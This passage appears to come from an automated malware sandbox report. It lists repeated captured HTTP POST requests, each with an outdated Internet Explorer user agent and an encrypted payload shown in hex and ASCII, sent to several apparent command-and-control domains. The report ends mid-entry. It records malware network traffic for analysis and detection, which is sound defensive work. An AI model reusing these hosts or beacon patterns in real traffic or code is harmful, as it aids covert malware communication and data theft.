4yZpdsz23wwoN7KGN8MPOt9ne5Sk+/fjwJTy32XTdtn9IGrwR4fAidMTM/EN/P0t2t9+hK4mgo5I7OPhpOx8YDwiGxg2TTapJH0J/xep1r4Jj+vOFTqVf+ALIH3/TsRoSU5/fXs5MB6BcA8jnjnb1gego8URcaQT+cllGx/AcjwR2TsjS+YjnQFTuAhZhWB2VTjs2NDSqXlv/pBILueZl+WVQc8Cm31ml2TdFbGi3w0lt6DiAbvYtp0se8/CtXAXkPSvLltJV/A02RjybcWMCTxwfBlyLqqeMhGp8C3dxNKQg/eesnESCxWzUVkFQOHZNAx5yWkW/kAEHpF/2x01GtYdHYyuHxuMDgJi6ttyouudBT3IR5dqTDAUCXTPtxF3tRkvEHatEG1VPy2reW9JgDbOndkB/ZbcZCryhUNOaW3T2L+ZJc5624VRGv7Zf49AfsHou7XDV03LqvoMheHKI1qwDZbO6o5RkFgT2T118BdBYk9BvsDirqKDpIsne5cEEKOd4bEffcU7qvmVxGCRFAcD1Kw/ZD22UsZ6LYitP1Y=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 72 31 4f 68 51 49 76 36 51 51 33 68 79 6b 57 58 34 67 34 76 71 76 53 41 55 41 6e 52 58 36 43 54 37 77 77 65 42 52 6a 61 79 47 30 43 78 67 78 75 64 74 4f 42 46 62 4a 4d 39 77 42 4b 49 61 74 79 36 4e 44 64 6d 58 52 2b 73 4d 6b 51 57 49 68 77 38 76 36 36 6e 72 67 73 31 68 67 4a 7a 36 67 30 73 50 36 51 6e 52 43 49 7a 5a 78 73 74 62 72 69 76 70 73 48 7a 78 75 72 46 78 55 78 43 33 39 6f 4b 68 36 4a 36 73 64 37 69 64 50 69 54 62 77 66 50 42 41 41 4e 78 30 58 56 7a 62 30 4b 69 31 33 54 6e 69 72 57 4e 55 76 66 34 59 69 38 55 35 79 4e 48 2b 37 2b 55 35 58 6a 45 6f 5a 6f 38 54 70 6f 56 43 31 69 42 54 68 46 35 43 59 4e 72 79 53 2f 54 43 44 6c 6e 37 54 76 54 58 35 35 6e 41 74 47 33 7a 73 36 33 6c 45 48 78 2b 62 2f 67 49 4a 30 72 61 34 58 4f 2f 44 4f 59 4f 56 79 67 70 59 63 36 35 43 47 42 79 42 62 6c 33 58 45 73 44 77 2b 31 77 64 75 63 47 59 6d 59 43 41 79 69 30 2f 67 4a 44 5a 6e 56 65 5a 39 6a 75 74 6e 6d 37 36 58 47 33 4b 63 35 2b 42 50 7a 31 2b 76 68 6f 6c 34 72 4d 57 4e 37 68 76 43 44 35 62 67 6f 33 76 48 78 35 73 65 70 67 71 7a 33 59 53 67 55 71 6a 35 6b 41 55 48 36 39 37 4c 55 74 51 76 68 4d 56 4a 39 57 6a 53 66 79 76 4a 6b 51 78 49 62 6d 46 4b 75 50 2b 6c 6b 7a 52 6a 4e 66 77 70 54 35 5a 32 75 44 42 45 55 43 48 47 50 43 57 34 39 4d 53 32 6d 36 6f 78 70 64 50 6e 35 4d 48 4f 71 4a 48 69 6f 62 68 2f 74 44 62 67 31 43 53 63 71 79 62 34 74 59 75 36 34 6e 36 54 33 66 46 6d 63 55 78 57 31 47 39 6a 50 54 6d 4f 41 64 6c 6c 75 51 42 6d 6b 69 71 47 53 4e 71 51 39 35 39 56 37 34 46 44 78 62 75 2f 4a 6a 61 6d 72 76 51 4f 32 4e 72 73 46 36 62 33 49 63 37 44 66 32 31 45 2f 76 67 4e 6e 2b 67 2b 7a 73 39 6d 42 54 70 48 66 39 65 36 6a 47 4c 7a 57 6e 6c 77 4f 74 59 47 45 69 41 4a 4b 59 62 35 39 4b 58 50 63 53 71 67 54 64 71 4e 41 3d 3d Data Ascii: r1OhQIv6QQ3hykWX4g4vqvSAUAnRX6CT7wweBRjayG0CxgxudtOBFbJM9wBKIaty6NDdmXR+sMkQWIhw8v66nrgs1hgJz6g0sP6QnRCIzZxstbrivpsHzxurFxUxC39oKh6J6sd7idPiTbwfPBAANx0XVzb0Ki13TnirWNUvf4Yi8U5yNH+7+U5XjEoZo8TpoVC1iBThF5CYNryS/TCDln7TvTX55nAtG3zs63lEHx+b/gIJ0ra4XO/DOYOVygpYc65CGByBbl3XEsDw+1wducGYmYCAyi0/gJDZnVeZ9jutnm76XG3Kc5+BPz1+vhol4rMWN7hvCD5bgo3vHx5sepgqz3YSgUqj5kAUH697LUtQvhMVJ9WjSfyvJkQxIbmFKuP+lkzRjNfwpT5Z2uDBEUCHGPCW49MS2m6oxpdPn5MHOqJHiobh/tDbg1CScqyb4tYu64n6T3fFmcUxW1G9jPTmOAdlluQBmkiqGSNqQ959V74FDxbu/JjamrvQO2NrsF6b3Ic7Df21E/vgNn+g+zs9mBTpHf9e6jGLzWnlwOtYGEiAJKYb59KXPcSqgTdqNA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 59 6b 4e 57 4a 30 51 6f 51 51 32 6e 39 63 4d 6f 58 78 5a 74 7a 52 63 73 72 46 78 38 5a 72 41 4c 75 4e 6c 61 5a 4e 74 42 38 64 33 49 34 39 4c 51 5a 42 4c 78 34 6e 4a 6c 42 65 79 31 34 4d 72 4f 49 39 7a 76 31 4a 4b 34 74 6e 74 2f 71 48 4f 36 77 53 33 4d 62 67 50 52 50 39 33 61 59 63 4c 34 77 42 53 4c 5a 4e 62 44 72 48 70 59 36 6d 79 45 35 2b 54 62 72 79 44 57 61 46 63 74 34 44 70 73 67 30 4b 6f 67 36 67 30 4b 79 42 53 41 7a 72 4f 6c 6c 56 44 72 33 38 48 63 45 71 57 75 41 6f 75 77 72 73 4a 72 47 4b 66 54 4a 73 49 79 4b 76 39 78 75 4d 70 2b 39 49 32 75 54 50 38 49 53 72 39 69 6e 79 53 64 32 73 55 74 65 53 30 39 68 78 52 30 37 4a 4b 4e 63 65 37 56 30 68 4a 72 71 53 74 4b 4f 71 79 67 67 6f 59 46 48 58 68 43 7a 6a 5a 53 74 6c 42 55 4a 46 6f 4d 35 56 2b 59 5a 57 71 52 6b 6d 61 66 52 74 6e 6e 68 47 77 6d 49 52 6d 71 47 6e 57 69 30 65 41 7a 57 62 45 4b 65 6c 68 71 6b 59 37 6a 6b 46 4f 54 56 45 75 4b 4a 61 32 30 65 69 5a 59 73 59 6b 45 79 57 48 48 6c 4d 55 70 56 45 41 6e 61 51 73 79 50 6c 55 57 58 59 76 6c 4f 51 69 47 65 4b 71 34 32 76 42 45 4d 48 6a 72 76 31 79 68 52 51 33 75 46 56 5a 31 30 75 77 39 44 4e 74 75 37 6f 6c 48 67 47 54 51 6a 64 6f 53 59 69 4b 2b 77 31 73 68 41 59 77 62 62 65 42 73 4f 63 53 38 61 78 58 78 6b 43 6b 58 46 2f 61 58 53 70 6a 30 66 73 72 2f 31 66 52 69 64 53 66 68 73 37 2b 49 64 74 44 37 4f 51 4d 6d 44 49 43 45 7a 72 49 66 66 79 31 4d 6d 6b 50 48 64 67 2f 6e 38 42 79 30 4f 56 46 33 37 63 46 38 58 72 61 5a 64 6c 4d 77 6f 45 69 41 52 6c 4f 51 5a 6f 54 48 4d 30 57 70 41 6a 4f 58 49 73 57 4c 76 6e 65 50 2f 57 2f 73 48 52 52 58 44 62 36 73 4e 49 5a 53 79 63 3d Data Ascii: YkNWJ0QoQQ2n9cMoXxZtzRcsrFx8ZrALuNlaZNtB8d3I49LQZBLx4nJlBey14MrOI9zv1JK4tnt/qHO6wS3MbgPRP93aYcL4wBSLZNbDrHpY6myE5+TbryDWaFct4Dpsg0Kog6g0KyBSAzrOllVDr38HcEqWuAouwrsJrGKfTJsIyKv9xuMp+9I2uTP8ISr9inySd2sUteS09hxR07JKNce7V0hJrqStKOqyggoYFHXhCzjZStlBUJFoM5V+YZWqRkmafRtnnhGwmIRmqGnWi0eAzWbEKelhqkY7jkFOTVEuKJa20eiZYsYkEyWHHlMUpVEAnaQsyPlUWXYvlOQiGeKq42vBEMHjrv1yhRQ3uFVZ10uw9DNtu7olHgGTQjdoSYiK+w1shAYwbbeBsOcS8axXxkCkXF/aXSpj0fsr/1fRidSfhs7+IdtD7OQMmDICEzrIffy1MmkPHdg/n8By0OVF37cF8XraZdlMwoEiARlOQZoTHM0WpAjOXIsWLvneP/W/sHRRXDb6sNIZSyc=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 65 56 4e 56 56 61 6d 6d 51 67 33 73 71 69 59 56 65 4c 2b 35 76 63 4c 6f 4c 4b 42 48 2b 55 73 78 37 5a 50 39 43 43 55 57 4d 58 67 43 50 4f 46 63 61 70 62 4f 76 74 6b 31 4e 57 57 50 76 7a 65 62 68 51 78 4d 78 4d 31 50 47 58 64 44 34 45 42 74 33 70 71 4d 65 35 75 37 79 39 69 71 6a 52 7a 43 46 63 33 37 36 33 59 30 6c 6d 67 74 57 2b 5a 37 52 64 51 72 4f 62 6a 32 33 32 45 2f 4b 34 6c 63 5a 7a 65 64 73 77 7a 34 48 58 44 47 35 37 51 41 48 52 7a 6f 63 61 53 75 64 5a 45 7a 73 76 65 6c 74 6b 5a 59 61 46 79 41 45 77 53 4f 76 6b 76 55 5a 53 4a 73 4e 4d 41 36 2b 4a 51 37 71 68 32 69 53 59 75 37 41 4e 51 30 72 59 45 54 52 46 4a 41 77 56 59 71 73 61 6d 4d 46 38 2f 4b 30 6c 7a 75 46 59 79 30 72 33 70 61 44 75 72 42 48 77 57 74 52 2b 35 66 56 43 34 30 50 42 79 62 75 53 77 63 56 50 76 2b 67 36 6c 79 71 6d 77 49 35 44 41 2f 2f 75 2f 48 6d 72 73 57 59 36 43 38 4a 2f 4f 52 55 59 53 70 4c 52 6c 77 5a 57 64 4a 6f 46 44 7a 51 70 38 4f 51 79 43 44 59 43 76 72 59 31 4e 4d 41 35 6d 59 51 62 33 30 64 32 52 75 67 73 5a 6b 38 6d 39 39 4d 65 71 67 74 5a 49 2f 4f 30 41 6a 45 43 6e 4a 33 34 37 31 36 43 6f 66 50 2f 59 47 73 77 35 7a 73 35 6d 72 6f 65 59 45 55 6d 41 74 41 36 61 2f 4c 72 71 68 53 6b 49 32 5a 72 51 35 51 6e 56 68 6d 6b 75 2f 77 49 39 54 50 4a 72 4e 73 54 4c 4d 6a 65 4c 74 7a 4b 4a 66 50 6b 39 59 4c 36 34 5a 61 70 6a 38 2f 53 38 51 6f 6b 69 6a 63 75 4d 2f 50 4d 76 70 46 73 46 61 65 50 68 31 33 48 48 62 67 37 59 6e 39 50 68 35 4a 41 67 4e 30 66 2b 78 32 64 75 37 57 58 36 73 55 6d 30 61 65 64 71 31 63 66 35 4d 2b 59 74 6e 6e 6a 63 74 35 41 47 73 50 4b 4c 62 64 2f 4a 4f 6a 48 6f 79 44 31 62 49 34 2f 41 78 38 53 39 73 32 41 3d 3d Data Ascii: eVNVVammQg3sqiYVeL+5vcLoLKBH+Usx7ZP9CCUWMXgCPOFcapbOvtk1NWWPvzebhQxMxM1PGXdD4EBt3pqMe5u7y9iqjRzCFc3763Y0lmgtW+Z7RdQrObj232E/K4lcZzedswz4HXDG57QAHRzocaSudZEzsveltkZYaFyAEwSOvkvUZSJsNMA6+JQ7qh2iSYu7ANQ0rYETRFJAwVYqsamMF8/K0lzuFYy0r3paDurBHwWtR+5fVC40PBybuSwcVPv+g6lyqmwI5DA//u/HmrsWY6C8J/ORUYSpLRlwZWdJoFDzQp8OQyCDYCvrY1NMA5mYQb30d2RugsZk8m99MeqgtZI/O0AjECnJ34716CofP/YGsw5zs5mroeYEUmAtA6a/LrqhSkI2ZrQ5QnVhmku/wI9TPJrNsTLMjeLtzKJfPk9YL64Zapj8/S8QokijcuM/PMvpFsFaePh13HHbg7Yn9Ph5JAgN0f+x2du7WX6sUm0aedq1cf5M+Ytnnjct5AGsPKLbd/JOjHoyD1bI4/Ax8S9s2A==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 72 63 30 35 79 38 5a 36 52 67 31 53 76 48 73 61 34 52 4e 45 2b 2b 6c 66 52 67 51 6d 51 42 53 70 57 69 4e 44 78 73 53 50 55 74 2f 56 61 37 66 4f 53 30 6a 72 4d 49 62 52 66 62 6e 43 31 70 70 67 49 2b 50 49 54 51 5a 4c 34 52 42 6f 7a 62 72 61 38 4a 30 67 53 34 7a 69 5a 37 50 32 61 6b 55 47 2b 4b 79 52 39 6a 49 76 67 57 6a 77 49 64 50 45 6d 71 44 59 4d 63 30 7a 48 61 41 79 67 6f 6c 38 78 62 34 71 48 61 68 4e 58 43 64 4b 57 4d 67 50 73 2f 59 70 6c 4a 51 68 75 78 6b 50 4e 55 56 55 71 59 33 57 31 4d 79 35 4f 77 7a 71 46 33 30 44 56 41 77 61 2b 4d 54 59 58 2f 54 74 4b 37 2f 2f 76 47 4d 51 74 7a 53 2b 64 4d 69 64 30 49 73 66 57 79 4a 4a 74 62 31 69 5a 38 53 50 33 79 2b 4c 63 30 53 71 50 2b 74 43 48 38 2b 72 52 70 55 50 66 58 75 62 39 73 61 62 59 44 4c 32 73 71 71 53 37 79 37 39 71 77 62 5a 76 4a 64 6f 57 51 30 44 57 6c 6e 73 4c 32 48 77 58 51 39 56 72 47 54 52 51 77 7a 5a 4a 4d 47 58 61 79 35 52 4d 58 4e 43 67 2f 48 2b 6b 52 68 33 2b 2f 4f 72 46 45 78 39 51 55 67 6b 4e 6e 75 74 2f 47 4d 46 44 5a 31 33 70 57 57 63 69 45 4e 51 77 71 76 69 31 44 43 5a 68 72 65 38 64 74 34 37 38 43 64 6a 75 50 39 75 41 67 36 47 65 76 73 56 37 47 50 6d 46 79 42 6f 59 63 55 6d 43 50 62 31 78 57 33 59 7a 35 79 34 58 65 46 65 44 43 6e 67 4d 39 4f 6f 76 51 59 79 72 79 4f 6a 6f 2b 76 41 56 6f 66 70 70 50 78 38 30 57 6c 42 55 74 31 6d 73 70 56 4d 4c 63 32 6e 46 61 35 33 49 51 78 6e 66 2b 58 75 30 77 70 70 36 6b 38 73 70 42 32 38 53 59 78 63 44 59 4c 67 2f 38 58 68 56 71 49 52 72 62 78 67 7a 4c 70 63 63 5a 67 6c 48 59 2b 36 44 34 55 6d 39 78 2f 71 74 58 63 33 7a 78 2f 71 67 61 36 76 Data Ascii: rc05y8Z6Rg1SvHsa4RNE++lfRgQmQBSpWiNDxsSPUt/Va7fOS0jrMIbRfbnC1ppgI+PITQZL4RBozbra8J0gS4ziZ7P2akUG+KyR9jIvgWjwIdPEmqDYMc0zHaAygol8xb4qHahNXCdKWMgPs/YplJQhuxkPNUVUqY3W1My5OwzqF30DVAwa+MTYX/TtK7//vGMQtzS+dMid0IsfWyJJtb1iZ8SP3y+Lc0SqP+tCH8+rRpUPfXub9sabYDL2sqqS7y79qwbZvJdoWQ0DWlnsL2HwXQ9VrGTRQwzZJMGXay5RMXNCg/H+kRh3+/OrFEx9QUgkNnut/GMFDZ13pWWciENQwqvi1DCZhre8dt478CdjuP9uAg6GevsV7GPmFyBoYcUmCPb1xW3Yz5y4XeFeDCngM9OovQYyryOjo+vAVofppPx80WlBUt1mspVMLc2nFa53IQxnf+Xu0wpp6k8spB28SYxcDYLg/8XhVqIRrbxgzLpccZglHY+6D4Um9x/qtXc3zx/qga6v
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 73 6f 69 6a 79 7a 56 2b 52 67 32 43 4e 39 31 69 6e 48 70 35 55 69 36 45 7a 4c 37 44 46 64 2b 45 4f 51 62 56 54 36 49 56 56 71 54 46 43 46 66 6e 72 56 35 79 30 33 64 70 77 6e 67 66 42 49 46 65 67 78 43 4c 69 57 44 79 2f 75 39 77 57 2f 55 4f 44 32 7a 48 34 4a 4d 47 35 71 76 34 79 75 38 69 4c 52 38 37 70 43 50 59 42 36 65 41 38 4c 37 66 42 32 47 31 39 6e 41 64 46 39 58 44 68 57 59 38 4b 38 55 6d 67 6f 72 57 75 51 73 54 4c 34 53 63 4e 66 2f 34 6a 51 4e 32 50 64 73 64 42 6c 61 6c 67 59 44 46 49 36 30 6b 46 62 77 48 67 70 2b 71 78 78 64 46 70 70 5a 52 65 6b 41 47 71 42 72 50 69 4f 55 34 4b 37 36 6b 44 56 54 66 6e 78 70 39 2f 4b 78 35 33 4d 48 42 49 54 54 6f 72 53 4d 79 64 53 74 43 74 38 78 79 77 56 66 4c 74 66 6c 64 4e 66 42 53 33 44 68 59 48 32 41 53 68 7a 69 58 75 76 53 53 57 44 79 43 68 66 49 72 39 4b 42 6d 6e 73 4c 6d 69 2b 37 75 34 4e 36 57 53 2b 75 51 5a 64 44 6f 6d 4b 73 41 2b 49 61 73 45 32 50 70 48 75 45 72 53 33 32 5a 6d 30 43 62 50 68 2b 6c 41 72 2f 4a 4c 63 64 51 37 55 6e 42 31 6f 62 4b 4f 76 4a 6b 74 52 53 56 57 6b 53 38 74 66 6a 63 69 6f 32 49 34 6e 71 57 6f 32 4f 4c 6f 35 57 6f 45 4c 6d 62 43 77 58 30 2b 2f 49 75 66 46 4c 50 36 32 54 48 6e 54 71 46 69 73 4b 62 61 68 67 6f 67 47 66 74 34 47 46 65 71 70 74 67 41 65 38 2f 62 75 65 42 78 73 35 39 4e 64 6c 52 4c 78 4d 4f 31 33 71 51 61 66 36 68 32 6a 48 74 7a 77 2f 77 64 42 4f 50 4a 39 48 70 56 33 55 56 4a 74 76 49 47 2f 4d 49 4a 6b 6e 57 44 41 51 2f 43 79 41 2f 35 2f 56 49 58 41 65 2b 39 52 39 69 4c 79 44 30 61 6b 69 36 71 31 42 70 49 45 67 49 59 34 2f 41 6a 35 58 38 51 54 72 75 61 75 70 74 72 39 66 68 70 66 47 73 45 62 74 4d 6d 44 32 53 74 5a 56 52 4b 37 39 39 70 38 39 6b 47 6e 70 77 78 7a 52 56 76 74 6f 3d Data Ascii: soijyzV+Rg2CN91inHp5Ui6EzL7DFd+EOQbVT6IVVqTFCFfnrV5y03dpwngfBIFegxCLiWDy/u9wW/UOD2zH4JMG5qv4yu8iLR87pCPYB6eA8L7fB2G19nAdF9XDhWY8K8UmgorWuQsTL4ScNf/4jQN2PdsdBlalgYDFI60kFbwHgp+qxxdFppZRekAGqBrPiOU4K76kDVTfnxp9/Kx53MHBITTorSMydStCt8xywVfLtfldNfBS3DhYH2AShziXuvSSWDyChfIr9KBmnsLmi+7u4N6WS+uQZdDomKsA+IasE2PpHuErS32Zm0CbPh+lAr/JLcdQ7UnB1obKOvJktRSVWkS8tfjcio2I4nqWo2OLo5WoELmbCwX0+/IufFLP62THnTqFisKbahgogGft4GFeqptgAe8/bueBxs59NdlRLxMO13qQaf6h2jHtzw/wdBOPJ9HpV3UVJtvIG/MIJknWDAQ/CyA/5/VIXAe+9R9iLyD0aki6q1BpIEgIY4/Aj5X8QTruauptr9fhpfGsEbtMmD2StZVRK799p89kGnpwxzRVvto=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 59 6b 4e 57 4a 30 51 6f 51 51 32 6e 39 63 4d 6f 58 78 5a 74 7a 52 63 73 72 46 78 38 5a 72 41 4c 75 4e 6c 61 5a 4e 74 42 38 64 33 49 34 39 4c 51 5a 42 4c 78 34 6e 4a 6c 42 65 79 31 34 4d 72 4f 49 39 7a 76 31 4a 4b 34 74 6e 74 2f 71 48 4f 36 77 53 33 4d 62 67 50 52 50 39 33 61 59 63 4c 34 77 42 53 4c 5a 4e 62 44 72 48 70 59 36 6d 79 45 35 2b 54 62 72 79 44 57 61 46 63 74 34 44 70 73 67 30 4b 6f 67 36 67 30 4b 79 42 53 41 7a 72 4f 6c 6c 56 44 72 33 38 48 63 45 71 57 75 41 6f 75 77 72 73 4a 72 47 4b 66 54 4a 73 49 79 4b 76 39 78 75 4d 70 2b 39 49 32 75 54 50 38 49 53 72 39 69 6e 79 53 64 32 73 55 74 65 53 30 39 68 78 52 30 37 4a 4b 4e 63 65 37 56 30 68 4a 72 71 53 74 4b 4f 71 79 67 67 6f 59 46 48 58 68 43 7a 6a 5a 53 74 6c 42 55 4a 46 6f 4d 35 56 2b 59 5a 57 71 52 6b 6d 61 66 52 74 6e 6e 68 47 77 6d 49 52 6d 71 47 6e 57 69 30 65 41 7a 57 62 45 4b 65 6c 68 71 6b 59 37 6a 6b 46 4f 54 56 45 75 4b 4a 61 32 30 65 69 5a 59 73 59 6b 45 79 57 48 48 6c 4d 55 70 56 45 41 6e 61 51 73 79 50 6c 55 57 58 59 76 6c 4f 51 69 47 65 4b 71 34 32 76 42 45 4d 48 6a 72 76 31 79 68 52 51 33 75 46 56 5a 31 30 75 77 39 44 4e 74 75 37 6f 6c 48 67 47 54 51 6a 64 6f 53 59 69 4b 2b 77 31 73 68 41 59 77 62 62 65 42 73 4f 63 53 38 61 78 58 78 6b 43 6b 58 46 2f 61 58 53 70 6a 30 66 73 72 2f 31 66 52 69 64 53 66 68 73 37 2b 49 64 74 44 37 4f 51 4d 6d 44 49 43 45 7a 72 49 66 66 79 31 4d 6d 6b 50 48 64 67 2f 6e 38 42 79 30 4f 56 46 33 37 63 46 38 58 72 61 5a 64 6c 4d 77 6f 45 69 41 52 6c 4f 51 5a 6f 54 48 4d 30 57 70 41 6a 4f 58 49 73 57 4c 76 6e 65 50 2f 57 2f 73 48 52 52 58 44 62 36 73 4e 49 5a 53 79 63 3d Data Ascii: YkNWJ0QoQQ2n9cMoXxZtzRcsrFx8ZrALuNlaZNtB8d3I49LQZBLx4nJlBey14MrOI9zv1JK4tnt/qHO6wS3MbgPRP93aYcL4wBSLZNbDrHpY6myE5+TbryDWaFct4Dpsg0Kog6g0KyBSAzrOllVDr38HcEqWuAouwrsJrGKfTJsIyKv9xuMp+9I2uTP8ISr9inySd2sUteS09hxR07JKNce7V0hJrqStKOqyggoYFHXhCzjZStlBUJFoM5V+YZWqRkmafRtnnhGwmIRmqGnWi0eAzWbEKelhqkY7jkFOTVEuKJa20eiZYsYkEyWHHlMUpVEAnaQsyPlUWXYvlOQiGeKq42vBEMHjrv1yhRQ3uFVZ10uw9DNtu7olHgGTQjdoSYiK+w1shAYwbbeBsOcS8axXxkCkXF/aXSpj0fsr/1fRidSfhs7+IdtD7OQMmDICEzrIffy1MmkPHdg/n8By0OVF37cF8XraZdlMwoEiARlOQZoTHM0WpAjOXIsWLvneP/W/sHRRXDb6sNIZSyc=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 72 63 30 35 79 38 5a 36 52 67 31 53 76 48 73 61 34 52 4e 45 2b 2b 6c 66 52 67 51 6d 51 42 53 70 57 69 4e 44 78 73 53 50 55 74 2f 56 61 37 66 4f 53 30 6a 72 4d 49 62 52 66 62 6e 43 31 70 70 67 49 2b 50 49 54 51 5a 4c 34 52 42 6f 7a 62 72 61 38 4a 30 67 53 34 7a 69 5a 37 50 32 61 6b 55 47 2b 4b 79 52 39 6a 49 76 67 57 6a 77 49 64 50 45 6d 71 44 59 4d 63 30 7a 48 61 41 79 67 6f 6c 38 78 62 34 71 48 61 68 4e 58 43 64 4b 57 4d 67 50 73 2f 59 70 6c 4a 51 68 75 78 6b 50 4e 55 56 55 71 59 33 57 31 4d 79 35 4f 77 7a 71 46 33 30 44 56 41 77 61 2b 4d 54 59 58 2f 54 74 4b 37 2f 2f 76 47 4d 51 74 7a 53 2b 64 4d 69 64 30 49 73 66 57 79 4a 4a 74 62 31 69 5a 38 53 50 33 79 2b 4c 63 30 53 71 50 2b 74 43 48 38 2b 72 52 70 55 50 66 58 75 62 39 73 61 62 59 44 4c 32 73 71 71 53 37 79 37 39 71 77 62 5a 76 4a 64 6f 57 51 30 44 57 6c 6e 73 4c 32 48 77 58 51 39 56 72 47 54 52 51 77 7a 5a 4a 4d 47 58 61 79 35 52 4d 58 4e 43 67 2f 48 2b 6b 52 68 33 2b 2f 4f 72 46 45 78 39 51 55 67 6b 4e 6e 75 74 2f 47 4d 46 44 5a 31 33 70 57 57 63 69 45 4e 51 77 71 76 69 31 44 43 5a 68 72 65 38 64 74 34 37 38 43 64 6a 75 50 39 75 41 67 36 47 65 76 73 56 37 47 50 6d 46 79 42 6f 59 63 55 6d 43 50 62 31 78 57 33 59 7a 35 79 34 58 65 46 65 44 43 6e 67 4d 39 4f 6f 76 51 59 79 72 79 4f 6a 6f 2b 76 41 56 6f 66 70 70 50 78 38 30 57 6c 42 55 74 31 6d 73 70 56 4d 4c 63 32 6e 46 61 35 33 49 51 78 6e 66 2b 58 75 30 77 70 70 36 6b 38 73 70 42 32 38 53 59 78 63 44 59 4c 67 2f 38 58 68 56 71 49 52 72 62 78 67 7a 4c 70 63 63 5a 67 6c 48 59 2b 36 44 34 55 6d 39 78 2f 71 74 58 63 33 7a 78 2f 71 67 61 36 76 Data Ascii: rc05y8Z6Rg1SvHsa4RNE++lfRgQmQBSpWiNDxsSPUt/Va7fOS0jrMIbRfbnC1ppgI+PITQZL4RBozbra8J0gS4ziZ7P2akUG+KyR9jIvgWjwIdPEmqDYMc0zHaAygol8xb4qHahNXCdKWMgPs/YplJQhuxkPNUVUqY3W1My5OwzqF30DVAwa+MTYX/TtK7//vGMQtzS+dMid0IsfWyJJtb1iZ8SP3y+Lc0SqP+tCH8+rRpUPfXub9sabYDL2sqqS7y79qwbZvJdoWQ0DWlnsL2HwXQ9VrGTRQwzZJMGXay5RMXNCg/H+kRh3+/OrFEx9QUgkNnut/GMFDZ13pWWciENQwqvi1DCZhre8dt478CdjuP9uAg6GevsV7GPmFyBoYcUmCPb1xW3Yz5y4XeFeDCngM9OovQYyryOjo+vAVofppPx80WlBUt1mspVMLc2nFa53IQxnf+Xu0wpp6k8spB28SYxcDYLg/8XhVqIRrbxgzLpccZglHY+6D4Um9x/qtXc3zx/qga6v
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 72 31 4f 68 51 49 76 36 51 51 33 68 79 6b 57 58 34 67 34 76 71 76 53 41 55 41 6e 52 58 36 43 54 37 77 77 65 42 52 6a 61 79 47 30 43 78 67 78 75 64 74 4f 42 46 62 4a 4d 39 77 42 4b 49 61 74 79 36 4e 44 64 6d 58 52 2b 73 4d 6b 51 57 49 68 77 38 76 36 36 6e 72 67 73 31 68 67 4a 7a 36 67 30 73 50 36 51 6e 52 43 49 7a 5a 78 73 74 62 72 69 76 70 73 48 7a 78 75 72 46 78 55 78 43 33 39 6f 4b 68 36 4a 36 73 64 37 69 64 50 69 54 62 77 66 50 42 41 41 4e 78 30 58 56 7a 62 30 4b 69 31 33 54 6e 69 72 57 4e 55 76 66 34 59 69 38 55 35 79 4e 48 2b 37 2b 55 35 58 6a 45 6f 5a 6f 38 54 70 6f 56 43 31 69 42 54 68 46 35 43 59 4e 72 79 53 2f 54 43 44 6c 6e 37 54 76 54 58 35 35 6e 41 74 47 33 7a 73 36 33 6c 45 48 78 2b 62 2f 67 49 4a 30 72 61 34 58 4f 2f 44 4f 59 4f 56 79 67 70 59 63 36 35 43 47 42 79 42 62 6c 33 58 45 73 44 77 2b 31 77 64 75 63 47 59 6d 59 43 41 79 69 30 2f 67 4a 44 5a 6e 56 65 5a 39 6a 75 74 6e 6d 37 36 58 47 33 4b 63 35 2b 42 50 7a 31 2b 76 68 6f 6c 34 72 4d 57 4e 37 68 76 43 44 35 62 67 6f 33 76 48 78 35 73 65 70 67 71 7a 33 59 53 67 55 71 6a 35 6b 41 55 48 36 39 37 4c 55 74 51 76 68 4d 56 4a 39 57 6a 53 66 79 76 4a 6b 51 78 49 62 6d 46 4b 75 50 2b 6c 6b 7a 52 6a 4e 66 77 70 54 35 5a 32 75 44 42 45 55 43 48 47 50 43 57 34 39 4d 53 32 6d 36 6f 78 70 64 50 6e 35 4d 48 4f 71 4a 48 69 6f 62 68 2f 74 44 62 67 31 43 53 63 71 79 62 34 74 59 75 36 34 6e 36 54 33 66 46 6d 63 55 78 57 31 47 39 6a 50 54 6d 4f 41 64 6c 6c 75 51 42 6d 6b 69 71 47 53 4e 71 51 39 35 39 56 37 34 46 44 78 62 75 2f 4a 6a 61 6d 72 76 51 4f 32 4e 72 73 46 36 62 33 49 63 37 44 66 32 31 45 2f 76 67 4e 6e 2b 67 2b 7a 73 39 6d 42 54 70 48 66 39 65 36 6a 47 4c 7a 57 6e 